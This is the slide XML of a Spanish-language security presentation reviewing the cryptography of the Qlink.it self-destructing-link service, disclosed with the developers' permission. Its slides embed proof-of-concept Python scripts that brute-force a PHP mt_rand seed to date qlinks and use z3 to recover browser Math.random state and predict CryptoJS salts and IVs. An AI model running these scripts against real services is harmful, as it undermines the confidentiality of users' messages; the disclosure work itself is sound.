            <a:ext cx="21183600" cy="128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-*- coding: utf-8 -*-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sys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requests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base64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binascii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hashlib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Crypto.Cipher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import AES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math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time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#####################################################################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'http://qlink'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#####################################################################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sesión de módulo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requests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para usar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keep-alive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sess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requests.Session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encabezados http, copiados de un navegador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headers = {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Accept':'application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text/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*/*; q=0.01',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'Accept-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Encoding':'gzip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deflate',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'Accept-Language':'es-419,es;q=0.8',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Connection':'keep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-alive',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'Content-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Type':'application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/x-www-form-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urlencoded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charset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=UTF-8',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Host':url.replace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('http://', '').replace('https://', ''),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Origin':url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Referer':url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+'/',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'User-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Agent':'Mozilla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/5.0 (Windows NT 6.1; WOW64)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AppleWebKit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/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36',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'X-Requested-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With':'XMLHttpRequest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obtener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token fresco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r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sess.get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'/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tokenizer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 headers=headers, data={})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x_token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r.json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()['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x_token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dentro de una función ahora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generar_qlink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mensaje_ql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generar parámetro simulando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de Date().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getTime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random_hash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time.time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()) * 1000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mensaje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mensaje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mensaje_ql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mensaje = "%%A%%" + mensaje + "%%C%%"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password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cualesquiera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password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b'123456'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"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ffffffffffffffff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"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ffffffffffffffffffffffffffffffff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iters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100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generación de llave para aes, simulando también versión original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javascript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llave = hashlib.pbkdf2_hmac('sha1',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password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binascii.unhexlify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iters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dklen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=32)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	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cifrado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cipher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AES.new(llave, AES.MODE_CBC,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binascii.unhexlify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data = base64.b64encode(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cipher.encrypt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mensaje.ljust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math.ceil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(mensaje) / 16.0) * 16), b'\0')))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para envío a web-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service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data = {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':'{"data":"' + data + '","salt":"' + salt + '","iv":"' + iv + '","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":'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iters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 + ',"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decom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":"false"}',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imprint':'false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captcha':'false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randomHash':random_hash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from':'web_app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x_token':x_token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lang':'es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replyIntent':'false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',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'n':'180'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envío a servidor y retorno de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generado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r = sess.post(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'/inject', headers=headers, data=data)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r.json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()['hash'] + '#' + password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obtención de semilla por fuerza bruta desde máximo (fecha/hora actual)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obtener_semilla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parcial_qlink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):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chars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'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'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epoch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time.time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# aproximaciones...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len_prueba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60*60*24*1000*2 # probar a lo sumo dos días hacia atrás desde máximo posible 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ii = 99999 + 999 + epoch * 1001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max = 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len_prueba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php_rand.mt_srand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((0xFFFFFFFF &amp; (ii-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for j in range(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parcial_qlink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g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php_rand.mt_rand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(0,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(chars)-1)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if chars[g] !=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parcial_qlink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[j]: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break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if (j + 1 &gt; max):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max = j + 1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if max == 10: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    return ii-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% 100000 == 0):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".",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generación de un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generar_qlink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('prueba')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generado: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obtener semilla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'obteniendo semilla...'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ql_parcial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 + 5:len(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 + 15]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s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obtener_semilla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ql_parcial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'semilla de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creado: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ql_parcial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+ ' -&gt;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(s)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cálculo aproximado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t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time.time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x_1 = (s - t) / 1000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x_2 = x_1 - 99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impresión de rango estimado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'el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anterior al recientemente creado fue generado, aproximadamente, entre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time.ctime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(x_2) + ' y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time.ctime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(x_1)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8825" y="609600"/>
            <a:ext cx="21183600" cy="128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hangingPunct="0"/>
            <a:r>
              <a:rPr lang="es-AR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-*-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coding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: utf-8 -*-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en base a https://github.com/douggard/XorShift128Plus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adaptado para resolución con valores truncados por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CryptoJS.lib.WordArray.random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ejemplo con entradas de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e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en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js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/application.js) para estimar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(adivinar) valores posibles siguientes del generador...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* sólo se tomó en cuenta ejemplo para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chrome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math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struct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import random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from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z3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import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*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###############################################################################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ejemplo capturado desde browser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chrome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alert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CryptoJS.lib.WordArray.random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(8).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toString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()); // así genera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el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que enviará al servidor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alert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CryptoJS.lib.WordArray.random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(32).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toString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substr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(0,32)); // así genera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qlink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el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que enviará al servidor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salt_hex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'f7f195a46835dd93'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iv_hex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'f37e44f2afe372308cb09ca5c102323d'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[sólo como ejemplo] siguientes 8 + 16 bytes de salida del generador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alert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CryptoJS.lib.WordArray.random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(8).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toString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()); // ejemplo de siguientes 8 bytes del generador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alert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CryptoJS.lib.WordArray.random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(32).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toString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substr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(0,32));  // ejemplo de siguientes 16 bytes del generador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sig_8b_hex = '544a197133f961c5'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sig_16b_hex = '24467b8acf7c8abc6751417f721d563c'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###############################################################################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'se estimarán valores siguientes considerando salida conocida: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salt_hex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+ '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iv_hex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words = [0, 0, 0, 0, 0, 0]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range(2):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ii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* 8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words[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salt_hex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[ii:ii+8] + '00000', 16) &amp; 0xFFFFFFFFFFFFF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#print words[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range(4):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ii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* 8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words[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+ 2]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iv_hex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[ii:ii+8] + '00000', 16) &amp; 0xFFFFFFFFFFFFF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#print words[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+ 2]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###############################################################################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xor_shift_128_plus algorithm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def xs128p(state0, state1):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= state0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s0 = state1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^= (s1 &lt;&lt; 23)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^= (s1 &gt;&gt; 17)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^= s0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^= (s0 &gt;&gt; 26) &amp; 0xFFFFFFFFFFFFFFFF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state0 = state1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state1 = s1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generated = (state0 + state1)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return state0, state1, generated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Symbolic execution of xs128p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def sym_xs128p(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slvr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sym_state0, sym_state1, generated, browser):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= sym_state0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s0 = sym_state1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^= (s1 &lt;&lt; 23)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^=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LShR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(s1, 17)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^= s0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s1 ^=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LShR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(s0, 26)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sym_state0 = sym_state1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sym_state1 = s1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calc = (sym_state0 + sym_state1)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condition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c%d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 %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(generated *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random.random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if browser == 'chrome':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#xxx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Implies(condition, (calc &amp; 0xFFFFFFFFFFFFF) ==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(generated))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Implies(condition, (calc &amp; 0xFFFFFFFF00000) ==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(generated))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browser ==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firefox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 or browser == 'safari':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Firefox and Safari save an extra bit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Implies(condition, (calc &amp; 0x1FFFFFFFFFFFFF) ==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(generated))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slvr.add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return sym_state0, sym_state1, [condition]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def reverse17(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^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&gt;&gt; 17) ^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&gt;&gt; 34) ^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&gt;&gt; 51)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def reverse23(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return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^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&lt;&lt; 23) ^ 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&lt;&lt; 46))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def xs128p_backward(state0, state1):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prev_state1 = state0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prev_state0 = state1 ^ (state0 &gt;&gt; 26)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prev_state0 = prev_state0 ^ state0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prev_state0 = reverse17(prev_state0)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prev_state0 = reverse23(prev_state0)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generated = (prev_state0 + prev_state1) &amp; 0xFFFFFFFFFFFFFFFF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return prev_state0, prev_state1, generated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Firefox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nextDouble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(rand_uint64 &amp; ((1 &lt;&lt; 53) - 1)) / (1 &lt;&lt; 53)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Chrome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nextDouble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((rand_uint64 &amp; ((1 &lt;&lt; 52) - 1)) | 0x3FF0000000000000) - 1.0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# Safari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weakRandom.get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(rand_uint64 &amp; ((1 &lt;&lt; 53) - 1) * (1.0 / (1 &lt;&lt; 53)))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to_double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(browser, out):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if browser == 'chrome':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double_bits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(out &amp; 0xFFFFFFFFFFFFF) | 0x3FF0000000000000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double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struct.unpack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('d',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struct.pack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('&lt;Q',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double_bits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))[0] - 1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browser ==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firefox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double = float(out &amp; 0x1FFFFFFFFFFFFF) / (0x1 &lt;&lt; 53)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browser == 'safari':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double = float(out &amp; 0x1FFFFFFFFFFFFF) * (1.0 / (0x1 &lt;&lt; 53))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return double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def main():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Note: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Safari tests have always turned up UNSAT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Wait for an update from Apple?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browser = 'safari'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browser = 'chrome'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browser =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firefox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print 'BROWSER: %s' % browser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In your browser's JavaScript console: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_ = []; for(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&lt;5; ++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 { _.push(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Math.random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()) } ; console.log(_)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Enter at least the 3 first random numbers you observed here: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#xxx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dubs = words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if browser == 'chrome':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dubs = dubs[::-1]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#xxx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#print dubs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print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valores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a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utilizar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(dubs)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print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resolviendo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...'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from the doubles, generate known piece of the original uint64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generated = []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#xxx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(3):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if browser == 'chrome':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# recovered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struct.unpack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('&lt;Q',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struct.pack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('d', dubs[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 + 1))[0] &amp; 0xFFFFFFFFFFFFF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browser == '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firefox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# recovered = dubs[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 * (0x1 &lt;&lt; 53)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elif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browser == 'safari':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# recovered = dubs[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 / (1.0 / (1 &lt;&lt; 53))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generated.append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(recovered)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(dubs)):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generated.append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(dubs[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setup symbolic state for xorshift128+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ostate0, ostate1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BitVecs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('ostate0 ostate1', 64)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sym_state0 = ostate0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sym_state1 = ostate1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slvr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Solver()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conditions = []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run symbolic xorshift128+ algorithm for three iterations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 using the recovered numbers as constraints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#xxx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#for ea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(3):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for ea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(dubs)):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sym_state0, sym_state1,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ret_conditions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sym_xs128p(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slvr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 sym_state0, sym_state1, generated[ea], browser)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conditions +=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ret_conditions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slvr.check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(conditions) == sat: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#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xxx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'modelo resuelto: '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slvr.model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print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sys.stdout.flush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get a solved state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m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slvr.model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state0 = m[ostate0].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as_long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state1 = m[ostate1].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as_long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generated = []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generate random numbers from recovered state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#xxx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(15):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for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idx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xrange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(200):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if browser == 'chrome':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state0, state1, out = xs128p_backward(state0, state1)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else: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    state0, state1, out = xs128p(state0, state1)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double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to_double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(browser, out)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generated.append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(double)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use generated numbers to predict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powerball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numbers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#xxx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#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power_ball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(generated, browser)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resultado_str_hex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''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for d in generated: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estimado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struct.unpack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('&lt;Q',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struct.pack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('d', d + 1))[0] &amp; 0xFFFFFFFF00000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resultado_str_hex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resultado_str_hex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hex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(estimado).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replace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('00000L', '').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replace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('0x', '')        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'siguientes 200x4bytes estimados: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resultado_str_hex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print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'encontrados siguientes 8bytes generados en browser? ' +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(sig_8b_hex in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resultado_str_hex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s-ES" sz="1000" dirty="0" err="1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 'encontrados siguientes 16bytes generados en browser?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' +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(sig_16b_hex in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resultado_str_hex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else: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print 'UNSAT'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main()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r>
              <a:rPr lang="es-ES" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr hangingPunct="0"/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  <a:p>
            <a:pPr hangingPunct="0"/>
            <a:r>
              <a:rPr lang="es-AR" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="10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¿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Qué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Qlink.it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?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6" y="4423350"/>
            <a:ext cx="10743956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MX" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>Desde el sitio web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="4800" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://qlink.it</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX" sz="4800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="es-MX" sz="4800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-MX" sz="4800" dirty="0" smtClean="0"/>
              <a:t>“Qlink.it es una nueva manera, muy simple y segura, de enviar información confidencial a través de internet”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="es-MX" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-MX" sz="4800" dirty="0" smtClean="0"/>
              <a:t>“Un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>qlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="4800" dirty="0" smtClean="0"/>
              <a:t> es un enlace normal de internet, pero con la característica especial de que se auto-destruye luego de que es leído por primera vez…”</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4800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453144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 cstate="print"/>
          <a:srcRect l="11250" t="5926" r="24149" b="8148"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="12188825" y="3810000"/>
            <a:ext cx="11814175" cy="883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¿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Qué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Qlink.it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? (ii)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5" y="4341088"/>
            <a:ext cx="12267960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MX" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Noticias recientes (marzo/abril de 2017)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544320" y="4448646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 l="9167" t="8519" r="36667" b="31481"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1825624" y="5715000"/>
            <a:ext cx="11963401" cy="7169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 cstate="print"/>
          <a:srcRect l="10833" t="9630" r="54150" b="9630"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="14855826" y="3581400"/>
            <a:ext cx="8839200" cy="1013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¿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Qué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Qlink.it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? (iii)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6" y="4340556"/>
            <a:ext cx="10743956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MX" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Código fuente disponible en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>github</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544320" y="4448646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 cstate="print"/>
          <a:srcRect l="10833" t="5556" r="23333" b="35368"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2892425" y="5504329"/>
            <a:ext cx="17449800" cy="821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¿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Qué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es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CryptoJS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?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6" y="4347628"/>
            <a:ext cx="12115077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4800" dirty="0" smtClean="0"/>
              <a:t>En Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>Archive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>Implementación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>funciones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>criptográficas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>estándar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>Proyecto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>ya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>mantenido</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>por</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>autor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> original de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>acuerdo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> a la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>aclaración</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>que</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>figura</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> en la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>página</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> principal del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>proyecto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> en Google Code Archive.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4800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 l="16250" t="8519" r="45417" b="5556"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="14855825" y="3531705"/>
            <a:ext cx="8382000" cy="1018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Trabajo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presentado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5" y="4350581"/>
            <a:ext cx="20574073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u="sng" dirty="0" smtClean="0"/>
              <a:t>Objetivo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>: describir los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>resultados preliminares </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>obtenidos luego de una revisión del código fuente de la aplicación web Qlink.it. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" u="sng" dirty="0" smtClean="0"/>
              <a:t>Alcance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>: Este análisis inicial, aunque incluyendo aspectos relacionados a la seguridad de la aplicación de manera general, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>tuvo foco particularmente en lo relativo a su implementación de funcionalidades criptográficas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>. Si bien, salvo por la vulnerabilidad de XSS detectada, los potenciales problemas podrían no representar riesgos reales, el objetivo de esta publicación es también </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>invitar a otros revisores </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>a estudiar el sistema para confirmar si su utilización podría considerarse segura.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4800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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530225" y="66294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4320" y="1182600"/>
            <a:ext cx="18645840" cy="21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Trabajo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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="138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presentado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="13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ntserrat Semi"/>
                <a:ea typeface="Montserrat Semi"/>
              </a:rPr>
              <a:t> (ii)</a:t>
            </a:r>
            <a:endParaRPr sz="6600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1463040" y="5887080"/>
            <a:ext cx="21931920" cy="252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82880" tIns="91440" rIns="182880" bIns="91440"/>
          <a:lstStyle/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  <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2400">
            <a:off x="1368585" y="4350581"/>
            <a:ext cx="20574073" cy="83048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u="sng" dirty="0" smtClean="0"/>
              <a:t>Justificación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>: Considerando, por un lado, que el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>GICSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> tiene por objetivo, entre otros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>, estudiar técnicas y mecanismos para la revisión de código fuente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>, con foco en los aspectos relacionados a la seguridad informática en general y a la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>criptografía en particular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>[4,5]; y por otro lado, que la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>DGT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> tiene por incumbencia, entre otras, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>evaluar periódicamente alternativas para la comunicación segura del personal de la Institución</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>; se realizó conjuntamente una primera revisión general del código fuente de la aplicación web Qlink.it </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544320" y="4495800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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2400">
            <a:off x="1356402" y="10356926"/>
            <a:ext cx="20574073" cy="2825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AR" sz="4800" u="sng" dirty="0" smtClean="0"/>
              <a:t>Permiso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>: Se agradece a los desarrolladores y responsables de Qlink.it por su rápida respuesta y su permiso para la publicación de los resultados preliminares. Se agradece también a Cristian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>Borghello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> por su ayuda en la publicación inicial resumida en su sitio web “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>Segu-Info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>”. </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530225" y="10502144"/>
            <a:ext cx="644400" cy="65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32847</TotalTime>
  <Words>1446</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Personalizado</PresentationFormat>
  <Paragraphs>800</Paragraphs>
  <Slides>31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31</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="34" baseType="lpstr">
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr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</vt:vector>
  </TitlesOfParts>
  <Company>Awesome PPT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usuario</cp:lastModifiedBy>
  <cp:revision>6183</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-11-12T21:47:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-09T14:48:12Z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Awesome PPT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Manager">
    <vt:lpwstr>Awesome PPT</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="Notes">
    <vt:i4>0</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="PresentationFormat">
    <vt:lpwstr>Personalizado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31</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="14" name="category">
    <vt:lpwstr>Awesome PPT</vt:lpwstr>
  </property>
</Properties>
</file>